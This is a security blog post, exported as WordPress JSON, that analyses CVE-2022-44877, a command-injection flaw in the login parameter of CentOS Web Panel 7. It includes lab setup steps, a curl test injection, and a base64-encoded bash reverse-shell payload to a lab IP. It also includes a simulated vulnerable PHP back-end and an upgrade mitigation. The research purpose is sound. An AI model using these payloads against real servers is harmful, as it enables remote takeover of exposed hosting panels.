{"id":61239,"date":"2023-01-27T07:04:17","date_gmt":"2023-01-26T23:04:17","guid":{"rendered":"https:\/\/version-2.com\/?p=61239"},"modified":"2024-09-13T16:31:48","modified_gmt":"2024-09-13T08:31:48","slug":"unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/01\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\/","title":{"rendered":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"61239\" class=\"elementor elementor-61239\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&
quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p align=\"center\"><img decoding=\"async\" class=\"head-img\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png\" alt=\"\" ><\/p>\n\n<h3>Introduction<\/h3>\n<p>An unauthenticated RCE in CentOS Web Panel 7 (CWP 7) has been found and registered as CVE-2022-44877.<\/p><p>Affected versions: <code>Centos Web Panel 7 - &lt; 0.9.8.1147<\/code><\/p>\n<p>This is one of the CVEs of the month, and based on GreyNoise (check it <a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/viz.greynoise.io\/tag\/centos-web-panel-rce-cve-2022-44877-attempt?days=30\">here<\/a>) there are 6 unique IPs that attempted to exploit this CVE.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kjYS6n8oVFp007KT0rarvA.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kjYS6n8oVFp007KT0rarvA.png\"><\/p>\n<p>Based on 
Shodan search (check it <a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/www.shodan.io\/search?query=cwpsrv+%2B+http.status%3A200\">here<\/a>), CWP is running on 453,848 servers.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*CGjO4kehKdauxOed8hGxMA.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*CGjO4kehKdauxOed8hGxMA.png\"><\/p>\n<h3>Build the&nbsp;lab<\/h3>\n<p><strong>Install the system<\/strong><\/p>\n<ul><li>Set up CentOS 7<\/li><li>Install wget: <code>sudo yum -y install wget<\/code><\/li><li>Update the system: <code>sudo yum -y update<\/code><\/li><li>Reboot<\/li><\/ul>\n<p><strong>Install CWP<\/strong><\/p>\n<p>Run these commands:<\/p><ul><li><code>sudo su<\/code><\/li><li><code>cd \/usr\/local\/src<\/code><\/li><li><code>wget http:\/\/centos-webpanel.com\/cwp-el7-latest<\/code><\/li><li><code>sh cwp-el7-latest<\/code><\/li><li>After the installation is done, reboot the system<\/li><\/ul>\n<p><strong>Downgrade CWP to the vulnerable version<\/strong><\/p>\n<p>Run these commands:<\/p><ul><li><code>cd \/usr\/local\/cwpsrv\/htdocs<\/code><\/li><li><code>chattr -i -R \/usr\/local\/cwpsrv\/htdocs<\/code><\/li><li><code>wget http:\/\/static.cdn-cwp.com\/files\/cwp\/el7\/cwp-el7-0.9.8.1146.zip<\/code><\/li><li><code>unzip -o -q cwp-el7-0.9.8.1146.zip<\/code><\/li><li><code>rm -f cwp-el7-0.9.8.1146.zip<\/code><\/li><li>Reboot the system<\/li><\/ul>\n<p><strong>Log in to CWP<\/strong><\/p>\n<ul><li>Open the link in the browser: <a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"http:\/\/IP:2030\/\">http:\/\/IP:2030\/<\/a><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*ZMsLy8ArzSoKnYwtGxdVfg.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*ZMsLy8ArzSoKnYwtGxdVfg.png\"><\/p>\n<ul><li>The username is root and the password is the root user\u2019s password.<\/li><\/ul>\n<p align=\"center\"><img 
decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*khtCbAQFBYWWNnw54brvKQ.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*khtCbAQFBYWWNnw54brvKQ.png\"><\/p>\n<h4>The vulnerability<\/h4>\n<p>The vulnerability is in the \u201clogin\u201d parameter of the login page.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*RkOz-mwMTcKB-xGxBf-LvQ.png\"><\/p>\n<ul><li>Capture the login request<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*a4bHEKS-ApbCQB6l_1pFDg.png\"><\/p>\n<ul><li>Now, let\u2019s make a simple test by trying to curl a website<\/li><li>Run a simple HTTP server: <code>python3 -m http.server<\/code><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*8HsFn-mV4z9QIMFap2CYXQ.png\"><\/p>\n<ul><li>Replace \u201clogin=logout\u201d with <code>login=$(curl${IFS}192.168.1.105:8000)<\/code><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*pR6Ks28cBIc3gW_iBYG1pw.png\"><\/p>\n<p>And here is the request:<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*4LxHWWb8U0UY-vXveW_lSw.png\"><\/p>\n<p>While reproducing this vulnerability, I noticed something about the authentication.<\/p>\n<p>This is supposed to be an \u201cunauthenticated RCE\u201d, but I found out that you still need to know the correct username.<\/p>\n<h4><strong>Here are some test&nbsp;cases:<\/strong><\/h4>\n<ul><li>Send the payload with the <strong>incorrect<\/strong> username &amp; <strong>incorrect<\/strong> password \u274c<\/li><li>Send the payload with the <strong>incorrect<\/strong> username &amp; <strong>correct<\/strong> password \u274c<\/li><li>Send the payload with the <strong>correct<\/strong> username &amp; <strong>incorrect<\/strong> password \u2705<\/li><\/ul>\n<p>Before we go to how 
to get a reverse shell, let\u2019s explain the payload.<\/p><p>Let\u2019s take this payload as an example:<\/p>\n<p><code>$(curl${IFS}192.168.1.105:8000)<\/code><\/p>\n<ul><li>The <code>IFS<\/code> variable (the shell\u2019s internal field separator, whitespace by default) is used here as the separator between the <code>curl<\/code> command and the URL, which is &#8220;192.168.1.105:8000&#8221;.<\/li><li>The <code>$()<\/code> operator (command substitution) executes the command inside the parentheses and returns its output. This means that the command makes a request to the specified IP address and port number using curl, and the output of the request is returned and can be used in the following commands or assigned to a variable.<\/li><\/ul>\n<h4>The RCE<\/h4>\n<ul><li>Here is the reverse shell:<\/li><\/ul><p><code>sh -i &gt;&amp; \/dev\/tcp\/192.168.1.105\/9001 0&gt;&amp;1<\/code><\/p><ul><li>Encode the reverse shell to Base64<\/li><\/ul><p><code>c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=<\/code><\/p><ul><li>The final format of the payload:<\/li><\/ul><p><code>$(echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)<\/code><\/p><ul><li>Start the listener<\/li><li>Send the payload<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*QMO4Hr9vSlebaZ28urgECw.png\"><\/p>\n<ul><li>Receive the connection<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*yNxasqNWMnG5t1TXp8ybvw.png\"><\/p>\n<ul><li>Let\u2019s see where the execution happened<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*X5Ndw0gGv6oKChPxVHPqJA.png\"><\/p>\n<p>Now we know that the login page under admin is the vulnerable one. Let\u2019s move to the static analysis.<\/p><h3>Static Analysis<\/h3>\n<p>Open the source code we downloaded from 
here:<\/p><p><code>http:\/\/static.cdn-cwp.com\/files\/cwp\/el7\/cwp-el7-0.9.8.1146.zip<\/code><\/p><p>Unfortunately, this is all that we got.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*OP88AzSATDySDfGbMAIhww.png\"><\/p>\n<p>The source code is encoded with ionCube; it\u2019s easy to decode or reverse engineer it, and it\u2019s illegal.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*LMLsdhp_DwZ1j6-FO9s0_Q.png\"><\/p>\n<p>We only have a one-line script here, which checks whether the ionCube Loader extension is loaded and, if not, attempts to load it dynamically.<\/p>\n<p>Since we don\u2019t have the source code, I wanted to get more insight into what the code would look like.<\/p><p>So I started to run more analysis, trying to understand the code in the back-end so I can simulate it:<\/p>\n<ul><li>I know that any command execution results are stored in the logs<\/li><\/ul><p>The login errors are recorded in <code>\/var\/log\/cwp_client_login.log<\/code><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*S0sPuLpwbiTDpg00K8qf5Q.png\"><\/p>\n<p>Now <code>cat cwp_client_login.log<\/code><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*0xd5f8M5M-RuFoZmB7Mn9g.png\"><\/p>\n<p>While doing this, I noticed the following:<\/p>\n<p>As we mentioned before, the user should be correct and we are assuming that we don\u2019t know the password. Since this is a failed login, the website will redirect the user to log in again.<\/p>\n<p>In this case, the command will not execute \u274c<\/p>\n<p align=\"center\"><img decoding=\"async\" class=\"lazyload\" src=\"https:\/\/raw.githubusercontent.com\/mhzcyber\/CVE-Analysis\/main\/CVE-2022%E2%80%9344877\/login%20failed%20-%20no%20command%20execution.gif\"><\/p>\n<p>In case we are using Burp Suite, once we 
send the request, the command gets executed \u2705<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/raw.githubusercontent.com\/mhzcyber\/CVE-Analysis\/main\/CVE-2022%E2%80%9344877\/execute%20command%20-%20burpsuite.gif\"><\/p>\n<p>Since the results of the executed commands are recorded in the log files, I want to analyze the logs.<\/p>\n<pre><code>2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https:\/\/localhost:2031\/login\/index.php?login=root'<\/code><\/pre>\n<ul><li>The \u201c2023-01-25 20:44:27\u201d date and time change every time, so this is a variable.<\/li><li>The \u201croot\u201d is the user<\/li><li>\u201cFailed Login from:\u201d This is a message and it\u2019s the same every time<\/li><li>The \u201c192.168.1.107\u201d is the IP of the user who is trying to log in<\/li><li><code>'https:\/\/localhost:2031\/login\/index.php?login=root'<\/code>: I\u2019m not sure why it\u2019s \u201clocalhost\u201d here; however, what we inject after \u201clogin=\u201d gets executed, and this changes every time, so it\u2019s a variable.<\/li><\/ul>\n<pre><code>$error = $DATE . \" \" . $USER . \" Failed Login from: \" . $IP . \" on: \" . $URL;<\/code><\/pre>\n<h4><strong>The facts we gathered:<\/strong><\/h4>\n<ul><li>There is a check: if the user is not correct, the execution doesn\u2019t work.<\/li><li>When the login error happens, the URL with the parameter is recorded in cwp_client_login.log<\/li><li>The date changes, the user (I\u2019m not sure about it, but it should be a 
variable as well), the failed login statement, and the user IP.<\/li><\/ul>\n<p>This brings us to a very interesting conclusion: only if there is a login error where the user is correct will the URL, along with the parameter, be stored in the log file.<\/p><p>We can understand that something goes wrong when the whole URL gets passed without enough sanitization.<\/p><p>After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that\u2019s how the false attempts are logged.<\/p>\n<p>The technique mentioned in the blogs is as follows:<\/p>\n<pre><code>echo \"incorrect_enter, IP address, HTTP_request_URI\" &gt;&gt; .\/wring_entry.log<\/code><\/pre>\n<p>After I made some tests, I found that unless we pass the payload in one of these specific forms:<\/p>\n<ul><li><code>$(command)<\/code><\/li><li><code>` command `<\/code><\/li><\/ul>\n<p>it won\u2019t execute, so that means there is something else. After more searching and asking questions, I looked for PHP functions that could be used to sanitize a parameter against command injection, because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.<\/p>\n<p>I found these two:<\/p><ul><li><code>escapeshellarg()<\/code>: This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.<\/li><li><code>escapeshellcmd()<\/code>: This function is used to escape a string that is used as a shell command. 
It escapes any characters that may be used to inject additional commands into the shell command.<\/li><\/ul>\n<p>I also found this resource:<\/p>\n<p><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/github.com\/kacperszurek\/exploits\/blob\/master\/GitList\/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do\">https:\/\/github.com\/kacperszurek\/exploits\/blob\/master\/GitList\/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do<\/a><\/p>\n<h4>Simulating the back-end&nbsp;code<\/h4>\n<p>This is my final conclusion of what the code could look like in the backend:<\/p>\n<pre><code>&lt;?php\n\/\/ Simulated back-end: the real CWP source is ionCube-encoded, so this is only a guess at its logic.\nif(isset($_POST['login'])) {\n    $date_time = date(\"Y-m-d H:i:s\");\n    $username = $_POST['username'];\n    $password = $_POST['password'];\n    \/\/ Full request URI, including the attacker-controlled login= query parameter.\n    $url = $_SERVER['REQUEST_URI'];\n    $remote_ip = $_SERVER[\"REMOTE_ADDR\"];\n    \/\/ Only the username is checked; the password is never verified.\n    if($username != \"root\"){\n        echo \"You are not authorized to login\";\n    }\n    else {\n        if($username == \"root\") {\n            \/\/ escapeshellarg() wraps the URI in single quotes, but the result is embedded in the\n            \/\/ double-quoted echo argument, where single quotes are literal and the shell still\n            \/\/ expands $(...) and backticks before echo runs.\n            $escapedUrl = escapeshellarg($url);\n            system(\"echo \\\"\" . $date_time . \" \" . $username . \" Successful Login from: \" . $remote_ip . \" on: \" . $escapedUrl . 
\"\\\" &gt;&gt; cwp_client_login.log\");\n            echo \"Welcome root\";\n        }\n        else {\n            echo \"Wrong Password or Username!\";\n        }\n    }\n}\n?&gt;\n\n&lt;form action=\"\" method=\"post\"&gt;\n    &lt;label for=\"username\"&gt;Username:&lt;\/label&gt;\n    &lt;input type=\"text\" name=\"username\" required&gt;\n    &lt;br&gt;\n    &lt;label for=\"password\"&gt;Password:&lt;\/label&gt;\n    &lt;input type=\"password\" name=\"password\" required&gt;\n    &lt;br&gt;\n    &lt;input type=\"submit\" name=\"login\" value=\"Login\"&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>Run the code to test it:<\/p><p><code>php -S ip:port test.php<\/code><\/p>\n<ul><li>Send the request<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kYFDXqpUAgY-8wlOKTcuHA.png\"><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*JpcxsgBAnufYGXnscs4GkQ.png\"><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*z4x8BULP3LtCx_kkZU96cA.png\"><\/p>\n\n<h3>Mitigation<\/h3>\n<p>Upgrade CWP to the latest version; the affected versions are those below 0.9.8.1147.<\/p>\n<h3>Final thoughts<\/h3>\n<p>This is a very simple and easy vulnerability to exploit, and that is what makes it more dangerous; however, it\u2019s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.<\/p><p>In our case, since the code is encoded and it\u2019s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend; therefore I needed to conduct a lot more analysis and tests, and also go through tons of research and asking questions.<\/p>\n<h3>Resources:<\/h3>\n<ul><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" 
href=\"https:\/\/socradar.io\/threat-actors-exploit-cve-2022-44877-rce-vulnerability-in-centos-web-panel-cwp\/\">https:\/\/socradar.io\/threat-actors-exploit-cve-2022-44877-rce-vulnerability-in-centos-web-panel-cwp\/<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/www.rezilion.com\/blog\/control-web-panel-vulnerability-cve-2022-44877-actively-exploited-in-the-wild\/\">https:\/\/www.rezilion.com\/blog\/control-web-panel-vulnerability-cve-2022-44877-actively-exploited-in-the-wild\/<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/github.com\/numanturle\/CVE-2022-44877\">https:\/\/github.com\/numanturle\/CVE-2022-44877<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/packetstormsecurity.com\/files\/170388\/Control-Web-Panel-7-Remote-Code-Execution.html\">https:\/\/packetstormsecurity.com\/files\/170388\/Control-Web-Panel-7-Remote-Code-Execution.html<\/a><\/li><\/ul>\n<p>#<strong>CVE-2022-44877 #CWP #RCE<\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction Unauthenticated RCE in Centos Web Panel 7\u200a [&hellip;]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-61239","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unauthenticated 
RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction Unauthenticated RCE in Centos Web Panel 7\u200a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-26T23:04:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\\\/\"},\"author\":{\"name\":\"versionpan\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\"},\"headline\":\"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) 
-\u200aCVE-2022\u201344877\",\"datePublished\":\"2023-01-26T23:04:17+00:00\",\"dateModified\":\"2024-09-13T08:31:48+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\\\/\"},\"wordCount\":1186,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cldd2rhfe01680jp8hul01ttb.png\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/01\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\",\"name\":\"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 
2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cldd2rhfe01680jp8hul01ttb.png\",\"datePublished\":\"2023-01-26T23:04:17+00:00\",\"dateModified\":\"2024-09-13T08:31:48+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cldd2rhfe01680jp8hul01ttb.png\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/blog-posts\\\/images\\\/cldd2rhfe01680jp8hul01ttb.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 
2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/103ffe36f7fd34a1cc126a30431b94d8\",\"name\":\"versionpan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g\",\"caption\":\"versionpan\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/versionpan\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
